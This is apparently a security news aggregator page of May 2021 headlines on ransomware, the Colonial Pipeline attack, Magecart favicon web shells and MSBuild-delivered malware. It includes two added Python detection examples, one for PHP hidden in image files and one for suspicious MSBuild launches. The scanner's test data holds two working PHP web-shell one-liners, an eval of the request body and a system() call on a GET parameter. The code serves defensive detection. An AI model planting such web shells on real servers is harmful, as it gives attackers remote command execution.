Abstract A worker at Amazon’s Bessemer, Ala. facility dropped a big allegation about security guards having access to a mailbox during the unionization election at a National Labor Relations Board hearing Friday. Meanwhile, Facebook lost a bid to block an Irish watchdog's draft decision that could suspend the tech giant’s ability to transfer data from the U.S. to the EU, and bipartisan groups of House lawmakers rolled out two pieces of legislation to protect critical infrastructure against cyberattacks following the ransomware attack on Colonial Pipeline. 

The Hill

May 14, 2021 – Malware

Hackers Using Microsoft Build Engine to Deliver Malware Filelessly Full Text

Abstract Threat actors are abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems. The actively ongoing campaign is said to have emerged last month, researchers from cybersecurity firm Anomali said on Thursday, adding that the malicious build files came embedded with encoded executables and shellcode that deploy backdoors, allowing the adversaries to take control of the victims' machines and steal sensitive information. MSBuild is an open-source build tool for .NET and Visual Studio developed by Microsoft that allows for compiling source code and for packaging, testing and deploying applications. In using MSBuild to filelessly compromise a machine, the idea is to stay under the radar and thwart detection, as such malware makes use of a legitimate application to load the attack code into memory, thereby leaving no traces of infection on the system and giving attackers a high level of stealth. As of writing, o

The Hacker News

May 14, 2021 – Business

Lemonade Denies “Unforgivably Negligent” Security Gaffe Full Text

Abstract Insurtech company says alleged lapse was merely customers sharing their quotes online

Infosecurity Magazine

May 14, 2021 – General

If We Don’t Secure People, Information Security Will Remain a Pipe Dream Full Text

Abstract Until employees are appropriately safeguarded, true information security is likely to remain just beyond reach.

Lawfare

May 14, 2021 – Privacy

Scheme flooding fingerprint technique may deanonymize Tor users Full Text

Abstract FingerprintJS experts devised a fingerprinting technique, named scheme flooding, that could allow identifying users across different desktop browsers, including the Tor Browser. FingerprintJS experts devised a new fingerprinting technique, named scheme...

Security Affairs

May 14, 2021 – Malware

RevengeRAT and AsyncRAT target aerospace and travel sectors Full Text

Abstract A campaign of remote access trojans is targeting the aerospace and travel industries with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.

SCMagazine

May 14, 2021 – Malware

FIN7 Backdoor Masquerades as Ethical Hacking Tool Full Text

Abstract The financially motivated cybercrime gang behind the Carbanak RAT is back with the Lizar malware, which can harvest all kinds of info from Windows machines.

Threatpost

May 14, 2021 – Ransomware

The Week in Ransomware - May 14th 2021 - One down, many more to go Full Text

Abstract Ransomware took the media spotlight this week after a ransomware gang known as DarkSide targeted critical infrastructure in the USA.

BleepingComputer

May 14, 2021 – Ransomware

Ransomware Gangs Are Now Leaking Stolen Data More Often Full Text

Abstract Researchers say more than 2,100 companies have had their data leaked on data leak sites hosted by ransomware groups since 2019, suggesting cybercriminals are doing it more frequently to extort their victims. Other cybercriminals are expected to follow suit in the future.

Cyware Alerts - Hacker News

May 14, 2021 – Policy and Law

Lawmakers roll out legislation to defend pipelines against cyber threats Full Text

Abstract A bipartisan group of more than a dozen House lawmakers have reintroduced legislation to defend pipelines against cyberattacks, with the bill coming on the heels of the devastating ransomware attack that forced the shutdown of Colonial Pipeline.

The Hill

May 14, 2021 – General

Report to Your Management with the Definitive ‘Incident Response for Management’ Presentation Template Full Text

Abstract Security incidents occur. It's not a matter of 'if' but of 'when.' Security products and procedures have been implemented to optimize the IR process, so from the security professional's angle, things are taken care of. However, many security pros who do an excellent job of handling incidents find effectively communicating the ongoing process to their management a much more challenging task. It's little surprise: management is typically not security savvy and doesn't really care about the bits and bytes the security pro masters. Cynet addresses this gap with the IR Reporting for Management PPT template, providing CISOs and CIOs with a clear and intuitive tool to report both the ongoing IR process and its conclusion. The IR for Management template enables CISOs and CIOs to communicate the two key points that management cares about: assurance that the incident is under control and a clear understanding of imp

The Hacker News

May 14, 2021 – Policy and Law

US Sentences Cyber-Stalker Who Sent Sex Workers to Family’s Home Full Text

Abstract Hawaiian widower placed under 3-year supervision for cyber-stalking a Utah family

Infosecurity Magazine

May 14, 2021 – Criminals

Darkside gang lost control of their servers and funds Full Text

Abstract The operators of the Darkside ransomware announced that they have lost control of their infrastructure and part of the funds the gang obtained from the victims. Darkside ransomware operators say they have lost control of their servers and funds resulting...

Security Affairs

May 14, 2021 – Government

In executive order, federal security provides impetus for far reaching cyber implications Full Text

Abstract At its core, Biden’s executive order looks to improve federal cybersecurity. But the tactics could have a trickle-down impact that drives greater collaboration and improves security standards throughout industry.

SCMagazine

May 14, 2021 – Covid-19

Verizon: Pandemic Ushers in ⅓ More Cyber-Misery Full Text

Abstract The DBIR – Verizon’s 2021 data breach report – shows spikes in sophisticated phishing, financially motivated cyberattacks and a criminal focus on web-application servers.

Threatpost

May 14, 2021 – Ransomware

DarkSide ransomware servers reportedly seized, operation shuts down Full Text

Abstract The DarkSide ransomware operation has allegedly shut down after the threat actors lost access to servers and their cryptocurrency was transferred to an unknown wallet.

BleepingComputer

May 14, 2021 – Vulnerabilities

Citrix Patches Vulnerability in Workspace App for Windows Full Text

Abstract Tracked as CVE-2021-22907, the flaw could be exploited by local attackers to escalate their privileges to SYSTEM level. All supported versions of Citrix Workspace app for Windows are affected by it.

Security Week

May 14, 2021 – Policy and Law

Lawmakers introduce bill to protect critical infrastructure against cyberattacks Full Text

Abstract Rep. Elissa Slotkin (D-Mich.) and other bipartisan House lawmakers on Friday introduced legislation designed to protect critical systems against cyberattacks, a week after a ransomware attack on the Colonial Pipeline significantly disrupted the fuel supply for portions of the country.

The Hill

May 14, 2021 – Hacker

Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal Full Text

Abstract Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of their operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called Transparent Tribe, also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking legitimate Indian military and defense organizations, and other malicious domains posing as file-sharing sites to host malicious artifacts. "While military and defense personnel continue to be the group's primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting," researchers from Cisco Talos said on Thursday. These domains are used to deliver maldocs distributing CrimsonRAT and ObliqueRAT, with the group incorporating new phishin

The Hacker News

May 14, 2021 – Breach

Rapid7 Source Code Accessed in Cyber-attack Full Text

Abstract Cybersecurity company’s source code compromised during supply-chain attack on Codecov

Infosecurity Magazine

May 14, 2021 – Hacker

Magecart gang hides PHP-based web shells in favicons Full Text

Abstract The Magecart cybercrime gang is using favicons to hide malicious PHP web shells that maintain remote access and inject JavaScript skimmers into online stores. Magecart hackers are distributing malicious PHP web shells hidden in website favicons to inject...

Security Affairs

May 14, 2021 – Government

Biden’s executive order aims to improve threat sharing by revising language in federal contracts Full Text

Abstract If successful, the goal could mean greater partnership between government and industry, addressing decades of contracting morass that stilted sharing of information about vulnerabilities.

SCMagazine

May 14, 2021 – Ransomware

QNAP warns of eCh0raix ransomware attacks, Roon Server zero-day Full Text

Abstract QNAP warns customers of an actively exploited Roon Server zero-day bug and eCh0raix ransomware attacks targeting their Network Attached Storage (NAS) devices, just two weeks after alerting them of an ongoing AgeLocker ransomware outbreak.

BleepingComputer

May 14, 2021 – Botnet

TeaBot Trojan: Active and Performing Fraudulent Activities Full Text

Abstract Cybersecurity researchers reported a new Android banking trojan that hijacks user credentials and text messages to carry out fraudulent activities against banks in Spain, Germany, the Netherlands, Belgium, and Italy.

Cyware Alerts - Hacker News

May 14, 2021 – Ransomware

Irish health service forced to shut down IT systems after ransomware attack Full Text

Abstract Ireland’s health care system was forced to shut down its IT systems Friday following what it described as a "significant" ransomware attack that disrupted operations.

The Hill

May 14, 2021 – Hacker

Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons Full Text

Abstract Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores," Malwarebytes' Jérôme Segura said in a Thursday write-up. "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer." Injecting web skimmers on e-commerce websites to steal credit card details is a tried-and-tested modus operandi of Magecart, a consortium of different hacker groups who target online shopping cart systems. Also known as formjacking attacks, the skimmers take the form of JavaScript code that the operators stealthily insert into an e-commerce website, often on payment pages, with an intent to c

The Hacker News
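
The favicon trick in the entry above is a file-type mismatch that a defender can hunt for on the web server itself: a file with an image extension that is really PHP. The scanner below is an added example written for this page, not code from Malwarebytes or The Hacker News. It walks a web root and flags any file with an image extension that contains a PHP open tag (a bare PHP file renamed .ico, or a genuine image with PHP appended), and, as a weaker signal, any "image" whose leading bytes match no known format. The sample web root it builds is constructed for the example; the magic-byte table and the finding labels are this example's own choices.

```python
import os
import re
import tempfile

# Magic bytes of the formats a favicon or site image is normally served as.
IMAGE_MAGIC = {
    b"\x00\x00\x01\x00": "ico",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
IMAGE_EXTENSIONS = {".ico", ".png", ".jpg", ".jpeg", ".gif"}
# Any PHP open tag inside a file that claims to be an image is the signal.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def image_type(data):
    """Return the image format implied by the leading bytes, or None."""
    for magic, name in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def classify(path):
    """Return a finding label for one file, or None if it looks benign."""
    with open(path, "rb") as fh:
        data = fh.read()
    ext = os.path.splitext(path)[1].lower()
    if ext not in IMAGE_EXTENSIONS:
        return None
    if PHP_OPEN_TAG.search(data):
        # Either a PHP file renamed to .ico, or a real image with PHP appended.
        return "php-code-in-image-file"
    if image_type(data) is None:
        # Weaker signal: an "image" that no image decoder would recognise.
        return "unrecognised-image-header"
    return None


def scan(root):
    """Walk a web root and return sorted (relative path, finding) pairs."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            label = classify(full)
            if label:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, label))
    return sorted(findings)


def build_sample_webroot():
    """Constructed sample web root: one genuine favicon, two disguised shells."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "img"))
    with open(os.path.join(root, "favicon.ico"), "wb") as fh:
        fh.write(b"\x00\x00\x01\x00\x01\x00" + b"\x00" * 32)  # real ICO header
    with open(os.path.join(root, "img", "favicon.ico"), "wb") as fh:
        fh.write(b"<?php eval(file_get_contents('php://input')); ?>")  # PHP named .ico
    with open(os.path.join(root, "img", "logo.png"), "wb") as fh:
        # valid PNG header followed by PHP: a polyglot that still renders as an image
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + b"<?php system($_GET['c']); ?>")
    return root


if __name__ == "__main__":
    for rel, label in scan(build_sample_webroot()):
        print(f"{label:28} {rel}")
```

A file named favicon.ico only runs as PHP when some PHP file includes it or the server maps it to the PHP handler, so pair this scan with a diff of recently modified .php files under the document root and of the web server's handler configuration.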

May 14, 2021 – Ransomware

Ireland’s Healthcare System’s IT Offline Following Ransomware Attack Full Text

Abstract HSE Ireland reveals it has taken its IT systems offline due to a "significant ransomware attack"

Infosecurity Magazine

May 14, 2021 – Ransomware

Ireland’s Health Service Executive hit by ransomware attack Full Text

Abstract Ireland’s Health Service Executive shut down its IT systems after they were hit with a “significant ransomware attack.” Another major ransomware attack made the headlines, this time the victim is Ireland’s Health Service Executive...

Security Affairs

May 14, 2021 – Criminals

Arkose Labs looks to hit cybercriminals where it hurts with $70 million cash infusion Full Text

Abstract Funds will filter in part to research and development, building upon the Arkose model of undermining economic drivers behind fraud until attackers opt out.

SCMagazine

May 14, 2021 – Ransomware

Irish healthcare shuts down IT systems after Conti ransomware attack Full Text

Abstract Ireland's Health Service Executive (HSE), the country's publicly funded healthcare system, has shut down all IT systems after its network was breached in a ransomware attack.

BleepingComputer

May 14, 2021 – Hacker

Darkside Hacking Group Linked to Colonial Pipeline Attack Says it is Closing Down Full Text

Abstract DarkSide has told associates it has lost access to the infrastructure it uses to run its operation and would be shutting down, citing pressure from law enforcement and from the U.S., FireEye said.

The Wall Street Journal

May 14, 2021 – Malware

Microsoft Alerts Aviation and Travel Firms to RAT Campaign Full Text

Abstract Sophisticated crypter-as-a-service ultimately leads to data theft

Infosecurity Magazine

May 14, 2021 – Ransomware

Colonial Pipeline likely paid a $5M ransom to DarkSide Full Text

Abstract DarkSide demanded a $5 million ransom from Colonial Pipeline, which has quickly recovered operations; did it pay? The Colonial Pipeline facility in Pelham, Alabama, was hit by a cybersecurity attack on Friday and its operators were forced to shut down...

Security Affairs

May 14, 2021 – Business

BluBracket raises $12 million to expand operations and support a shift left in code testing Full Text

Abstract Code automation company BluBracket on Thursday said it raised $12 million in Series A funding so it can continue to work with DevSecOps teams to build security into products from the start and shift code development left.

SCMagazine

May 14, 2021 – Malware

Snip3 Crypter Service Delivers Multiple RAT Families Full Text

Abstract Researchers have recently monitored a highly sophisticated Crypter-as-a-Service that delivers multiple RAT families onto target machines through phishing emails. It can also detect sandboxes and virtual machines and adjust the malware it delivers accordingly.

Cyware Alerts - Hacker News

May 14, 2021 – General

Quarter of CISOs Self-Medicate as Pandemic Stress Spikes Full Text

Abstract OneLogin claims only half have access to mental health services

Infosecurity Magazine

May 14, 2021 – Ransomware

Attacks by Avaddon Ransomware are Escalating Full Text

Abstract Ransomware attacks by the Avaddon group are targeting organizations from several sectors based in the U.S. and worldwide. According to the FBI, the ransomware associates are breaching the networks of healthcare, manufacturing, and other private sector organizations worldwide.

Cyware Alerts - Hacker News

May 14, 2021 – Ransomware

US pipeline ransomware attack serves as fair warning to persistent corporate inertia over security Full Text

Abstract That companies continue to disregard the need for basic cybersecurity hygiene signals the need for firmer action, especially as cybercriminals turn their focus to operational technology sectors.

ZDNet

May 14, 2021 – Outage

Colonial Reportedly Paid $5 Million Ransom Full Text

Abstract Pipeline still suffered several-day outage

Infosecurity Magazine

May 14, 2021 – General

Big Cybersecurity Tips For Remote Workers Who Use Their Own Tech Full Text

Abstract As the total number of people working from home has grown dramatically in the last year or two, so has the number of individuals who use all of their own technology for their jobs. If you're a remote worker who relies on your own PC to get your work done, then you may be at a heightened risk for some of the major threats that are impacting the computer industry as a whole. Relatively few people take all of the recommended precautions when using their own technology. While it's unlikely that people are engaged in any riskier behaviors than they were before, the fact that few people have the time to follow all the relevant pieces of cybersecurity news means some people might be unaware of certain active threats. That may explain how a password manager was used to install malicious code on a large number of client machines. Though you might not want to follow all of the news that comes out about security issues on a daily basis, you might find it helpful to pay close attentio

The Hacker News

May 14, 2021 – Vulnerabilities

FortiGuard Labs Discovers Multiple Critical Zero Day Vulnerabilities in Adobe Illustrator Full Text

Abstract They are identified as CVE-2021-21103, CVE-2021-21104, and CVE-2021-21105. All these vulnerabilities have different root causes related to a variety of Illustrator Plugins.

Fortinet

May 14, 2021 – Business

Fidelis Buys CloudPassage To Better Monitor Cloud Assets Full Text

Abstract Fidelis was impressed by CloudPassage’s ability to collect telemetry from the enterprise and deliver cloud security posture management and cloud workload protection from a single platform.

CRN

May 14, 2021 – Ransomware

Colonial Pipeline Paid Nearly $5 Million in Ransom to Cybercriminals Full Text

Abstract Colonial Pipeline on Thursday restored operations to its entire pipeline system nearly a week following a ransomware infection targeting its IT systems, forcing it to reportedly shell out nearly $5 million to restore control of its computer networks. "Following this restart, it will take several days for the product delivery supply chain to return to normal," the company said in a statement on Thursday evening. "Some markets served by Colonial Pipeline may experience, or continue to experience, intermittent service interruptions during this start-up period. Colonial will move as much gasoline, diesel, and jet fuel as is safely possible and will continue to do so until markets return to normal." The company's official website, however, has been taken offline as of writing with an access denied message "This request was blocked by the security rules." Bloomberg, citing "two people familiar with the transaction," said the company made t

The Hacker News

May 14, 2021 – Vulnerabilities

Cross-browser tracking vulnerability tracks you via installed apps Full Text

Abstract Researchers have developed a way to track a user across different browsers on the same machine by querying the installed applications on the device.

BleepingComputer

May 14, 2021 – Breach

Rapid7 Source Code Breached in Codecov Supply-Chain Attack Full Text

Abstract Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year. "A small subset of our source code repositories for internal tooling for our [Managed Detection and Response] service was accessed by an unauthorized party outside of Rapid7," the Boston-based firm said in a disclosure. "These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers." On April 15, software auditing startup Codecov alerted customers that its Bash Uploader utility had been infected with a backdoor as early as January 31 by unknown parties to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1. "The actor gained access bec

The Hacker News

May 14, 2021 – Attack

Rapid7 says source code, credentials accessed as a Result of Codecov supply-chain attack Full Text

Abstract Rapid7 disclosed that an unauthorized third party had access to source code and customer data as a result of the Codecov supply chain attack. Cyber security vendor Rapid7 reveals it was impacted by the Codecov software supply chain attack, attackers had access...

Security Affairs

May 13, 2021 – Ransomware

Popular Russian hacking forum XSS bans all ransomware topics Full Text

Abstract One of the most popular Russian-speaking hacker forums, XSS, has banned all topics promoting ransomware to prevent unwanted attention.

BleepingComputer

May 13, 2021 – Ransomware

Chemical distributor pays $4.4 million to DarkSide ransomware Full Text

Abstract Chemical distribution company Brenntag paid a $4.4 million ransom in Bitcoin to the DarkSide ransomware gang to receive a decryptor for encrypted files and prevent the threat actors from publicly leaking stolen data.

BleepingComputer

May 13, 2021 – Privacy

Apple’s Find My network can be abused to leak secrets to the outside world via passing devices Full Text

Abstract Passing Apple devices can be used to sneak out portions of information from one place to another, such as a computer on the other side of the world, over the air without any network connectivity.

The Register

May 13, 2021 – General

Hillicon Valley: Colonial pipeline is back online, but concerns remain | Uber, Lyft struggle with driver supply | Apple cuts controversial hire Full Text

Abstract President Biden on Thursday said that while the Russian government was not behind the recent ransomware attack on the Colonial Pipeline, the cyber criminals involved were based in Russia, and his administration would take steps to disrupt the group. Colonial Pipeline, which restarted operations Wednesday, reportedly chose to pay the ransom to regain access to its networks. In non-pipeline news, Amazon said it will soon hire 75,000 additional employees in the U.S. and Canada.

The Hill

May 13, 2021 – General

Cyber-bullying Spawns Artistic Protest Full Text

Abstract Artists turn 700 misogynistic comments made online into 3,000m-long artwork

Infosecurity Magazine

May 13, 2021 – Government

Everything You Need to Know about the New Executive Order on Cybersecurity Full Text

Abstract The Biden Administration has released its much-anticipated Executive Order aiming to improve federal cybersecurity standards and other aspects of cybersecurity.  Here’s what you need to know.

Lawfare

May 13, 2021 – General

Security at Bay: Critical Infrastructure Under Attack Full Text

Abstract The recent Colonial Pipeline attack highlights the dangers that are facing Critical Infrastructure worldwide. The attack perpetrated by hackers on oil company Colonial Pipeline highlights the dangers that are facing Industrial Control Systems (ICS)...

Security Affairs

May 13, 2021 – Vulnerabilities

Developers knowingly push flawed code, doubt build environments are secure Full Text

Abstract A recent survey found that most development teams, 81%, knowingly pushed flawed code live, and 20% of senior managers even admitted to doing so often.

SCMagazine

May 13, 2021 – Malware

Fresh Loader Targets Aviation Victims with Spy RATs Full Text

Abstract The campaign is harvesting screenshots, keystrokes, credentials, webcam feeds, browser and clipboard data and more, with RevengeRAT or AsyncRAT payloads.

Threatpost

May 13, 2021 – Breach

Rapid7 source code, credentials accessed in Codecov supply-chain attack Full Text

Abstract US cybersecurity firm Rapid7 has disclosed that some source code repositories were accessed in a security incident linked to the supply-chain attack that recently impacted customers of the popular Codecov code coverage tool.

BleepingComputer

May 13, 2021 – Ransomware

Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom Full Text

Abstract Colonial Pipeline Co. paid nearly $5 million to Eastern European hackers on Friday, contradicting reports earlier this week that the company had no intention of paying an extortion fee.

Bloomberg

May 13, 2021 – Government

Biden says Colonial Pipeline hackers based in Russia, but not government-backed Full Text

Abstract President Biden on Thursday confirmed that the cyber criminals involved in launching a ransomware attack that disrupted operations at Colonial Pipeline last week are likely based in Russia, though he said officials do not believe that the Russian government was involved. 

The Hill

May 13, 2021 – General

Cyber-attacks Cost Small US Businesses $25k Annually Full Text

Abstract New research reveals cyber-attacks leave small businesses with big bills

Infosecurity Magazine

May 13, 2021 – General

Please vote Security Affairs – 1 day left Full Text

Abstract Hi Guys, I need your support. I became aware only now that we can nominate SecurityAffairs as Best Personal Blog. I need your support. Please vote Security Affairs as Best Personal cybersecurity Blog at the following link https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform The...

Security Affairs

May 13, 2021 – Breach

Rapid7: Attackers got ‘limited access’ to source code, customer data after Codecov breach Full Text

Abstract The company claims no other systems or parts of its corporate network were compromised after using Codecov’s corrupted Bash Uploader script.

SCMagazine

May 13, 2021 – General

Pipeline Update: Biden Executive Order, DarkSide Detailed and Gas Bags Full Text

Abstract FBI/CISA warn about the RaaS network behind the Colonial hack, Colonial restarts operations, and researchers detail groups that rent the ransomware.

Threatpost

May 13, 2021 – Ransomware

Colonial Pipeline restores operations, $5 million ransom demanded Full Text

Abstract Colonial Pipeline Company has recovered quickly from the ransomware attack suffered less than a week ago and expects all its infrastructure to be fully operational today.

BleepingComputer

May 13, 2021 – APT

Transparent Tribe APT Expands its Windows Malware Arsenal with ObliqueRAT Full Text

Abstract Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations.

Cisco Talos

May 13, 2021 – Government

Pelosi says firms should not pay ransoms to hackers Full Text

Abstract Speaker Nancy Pelosi (D-Calif.) warned Thursday that private firms should reject hackers' demands for ransoms, just hours after reports emerged that a major energy company had paid almost $5 million to help restore service following a crippling ransomware attack.

The Hill

May 13, 2021 – General

Consumers Unforgiving of Merchants’ Data Failings Full Text

Abstract Data-conscious online shoppers in the US will ditch a merchant over a single lapse in data security

Infosecurity Magazine

May 13, 2021 – Attack

Organizations in aerospace and travel sectors under attack, Microsoft warns Full Text

Abstract Microsoft warns of a malware-based campaign that targeted organizations in the aerospace and travel sectors in the past months. Microsoft researchers revealed that organizations in the aerospace and travel sectors have been targeted in the past months...

Security Affairs

May 13, 2021 – Malware

Microsoft build tool abused to deliver password-stealing malware Full Text

Abstract Threat actors are abusing the Microsoft Build Engine (MSBuild) to deploy remote access tools and information-stealing malware filelessly as part of an ongoing campaign.

BleepingComputer
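
MSBuild is a signed Microsoft binary, so the detection opportunity is less the binary itself than the context it runs in: which file it was pointed at, where that file lives, and what launched it. The rule below is an added example written for this page, not code from BleepingComputer or from the researchers who reported the campaign. It runs over constructed process-creation events (the field names, the staging-directory pattern, the parent-process list and the project-file extensions are all this example's own assumptions) and raises an alert whenever msbuild.exe is handed a project file from a user-writable staging directory, a file with a non-project extension, or is spawned by an Office application, script host or browser.

```python
import ntpath
import re

# Constructed process-creation events, in the shape an EDR or Sysmon (event ID 1)
# pipeline would hand a detection rule. Field names are this example's own.
SAMPLE_EVENTS = [
    {   # a script host launched MSBuild on a .proj dropped into %TEMP%
        "user": r"CORP\alice",
        "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        "command_line": r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\tmp3F2A.proj",
        "parent_image": r"C:\Windows\System32\wscript.exe",
    },
    {   # ordinary developer build started from Visual Studio
        "user": r"CORP\bob",
        "image": r"C:\Program Files\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\MSBuild.exe",
        "command_line": r'MSBuild.exe "C:\src\shop\Shop.sln" /t:Build /p:Configuration=Release',
        "parent_image": r"C:\Program Files\Microsoft Visual Studio\2019\Enterprise\Common7\IDE\devenv.exe",
    },
    {   # project file with a non-project extension in a world-writable folder
        "user": r"CORP\carol",
        "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
        "command_line": r"msbuild.exe /nologo C:\Users\Public\update.xml",
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # unrelated process, must be ignored
        "user": r"CORP\dave",
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe",
        "parent_image": r"C:\Windows\explorer.exe",
    },
]

# Heuristics; assumptions for this example, tune them to your own estate.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",   # Office
    "wscript.exe", "cscript.exe", "mshta.exe",                   # script hosts
    "chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe",   # browsers
}
STAGING_DIRS = re.compile(
    r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads|Windows\\Temp)\\",
    re.IGNORECASE,
)
PROJECT_EXTENSIONS = {".proj", ".csproj", ".vbproj", ".fsproj", ".sln",
                      ".targets", ".props", ".msbuildproj", ".pubxml"}


def tokenize(command_line):
    """Split a Windows command line, honouring double-quoted arguments."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command_line)]


def project_file(command_line):
    """First positional argument after the executable: the project MSBuild will run."""
    for token in tokenize(command_line)[1:]:
        if not token.startswith(("/", "-", "@")):
            return token
    return None


def msbuild_signals(event):
    """Return the suspicious traits of one event (empty if none, or not MSBuild)."""
    if ntpath.basename(event["image"]).lower() != "msbuild.exe":
        return []
    signals = []
    target = project_file(event["command_line"])
    if target:
        if STAGING_DIRS.search(target):
            signals.append("project file in user-writable staging directory")
        if ntpath.splitext(target)[1].lower() not in PROJECT_EXTENSIONS:
            signals.append("unusual project file extension")
    parent = ntpath.basename(event["parent_image"]).lower()
    if parent in SUSPICIOUS_PARENTS:
        signals.append(f"spawned by {parent}")
    return signals


def detect(events):
    """Run the rule over a batch of events and return one alert per hit."""
    alerts = []
    for event in events:
        signals = msbuild_signals(event)
        if signals:
            alerts.append({"user": event["user"],
                           "target": project_file(event["command_line"]),
                           "signals": signals})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["user"], alert["target"], "; ".join(alert["signals"]))
```

Because the payload is compiled and run from inline task code inside the project file, the file itself is worth collecting at alert time: a .proj or .xml containing a UsingTask with inline C# is not something a build server normally produces in a user's Temp folder.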

May 13, 2021 – Business

AI-powered identity access management platform Authomize raises $16M Full Text

Abstract Cloud-based authorization startup Authomize today announced that it raised $16 million in series A funding led by Innovation Endeavors, bringing the startup’s total raised to $22 million to date.

Venture Beat

May 13, 2021 – Ransomware

Colonial paid hackers almost $5M in ransom: report Full Text

Abstract Colonial Pipeline paid almost $5 million in ransom to hackers last Friday despite reports that said the company had no intention of paying, Bloomberg news reported.

The Hill

May 13, 2021 – Covid-19

Record Number of Breaches Detected Amid #COVID19 Full Text

Abstract 85% of breaches analyzed in the report involved a human element

Infosecurity Magazine

May 13, 2021 – Vulnerabilities

Cisco fixes AnyConnect Client VPN zero-day disclosed in November Full Text

Abstract Cisco has addressed a zero-day in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code. Cisco has addressed a zero-day vulnerability in Cisco AnyConnect Secure Mobility Client, tracked as CVE-2020-3556, that...

Security Affairs

May 13, 2021 – Ransomware

Meet Lorenz — A new ransomware gang targeting the enterprise Full Text

Abstract A new ransomware operation known as Lorenz targets organizations worldwide with customized attacks demanding hundreds of thousands of dollars in ransoms.

BleepingComputer

May 13, 2021 – Ransomware

Norwegian Green Energy Company Volue Hit by Ransomware Attack Full Text

Abstract Norway-based green energy solutions provider Volue has been working on restoring systems after being targeted in a ransomware attack by the Ryuk operators which was detected on May 5.

Security Week

May 13, 2021 – Ransomware

Insurance giant CNA fully restores systems after ransomware attack Full Text

Abstract Leading US-based insurance company CNA Financial has fully restored systems following a Phoenix CryptoLocker ransomware attack that disrupted its online services and business operations during late March.

BleepingComputer

May 13, 2021 – Vulnerabilities

Cisco fixes 6-month-old AnyConnect VPN zero-day with exploit code Full Text

Abstract Cisco has fixed a six-month-old zero-day vulnerability found in the Cisco AnyConnect Secure Mobility Client VPN software, with publicly available proof-of-concept exploit code.

BleepingComputer

May 13, 2021 – Business

Code-scanning platform BluBracket nabs $12M for enterprise security Full Text

Abstract Code security startup BluBracket today announced it has raised $12 million in a Series A round led by Evolution Equity Partners to further develop BluBracket’s products and grow its sales team.

Venture Beat

May 13, 2021 – Accident

Crypto exchange glitch causes duplicate purchases, delayed credits Full Text

Abstract This week, recurring glitches on the popular cryptocurrency exchange Crypto.com caused multi-day delays for users in receiving their purchased assets. Moreover, those reattempting "declined" or "expired" transactions were charged multiple times for duplicate purchases.

BleepingComputer

May 13, 2021 – Government

CISA and FBI Provide Technical Details and Mitigations for DarkSide Ransomware-as-a-Service Full Text

Abstract The DarkSide ransomware gang first emerged in the threat landscape in August 2020. In recent months, the ransomware group has been very active and has targeted organizations worldwide.

ICSA

May 13, 2021 – General

Can Data Protection Systems Prevent Data At Rest Leakage? Full Text

Abstract Protection against insider risks works when the process involves controlling the data transfer channels or examining data sources. One approach involves preventing files from being copied to USB flash drives or sent over email. The second concerns preventing leakage or fraud in which an insider accesses files or databases with harmful intentions. What's the best way to protect your data? It seems obvious that prevention is the best way to solve any problem. In most cases, DCAP (data-centric audit and protection) and DAM (database activity monitoring) are sufficient. Both serve the purpose of protecting data at rest. The following example illustrates the approach we found in the Russian legal system. An employee of the Federal Migration Service in one of the Russian regions was approached by his friend, who asked him to hide information about two offenses in his file in the migrant database. The employee knew that this could be done remotely, accessed the database from home,

The Hacker News

May 13, 2021 – Government

Biden Executive Order Mandates Zero Trust and Strong Encryption Full Text

Abstract Wide-ranging measures win praise from industry experts

Infosecurity Magazine

May 13, 2021 – Government

Biden Signs Executive Order on Cybersecurity Full Text

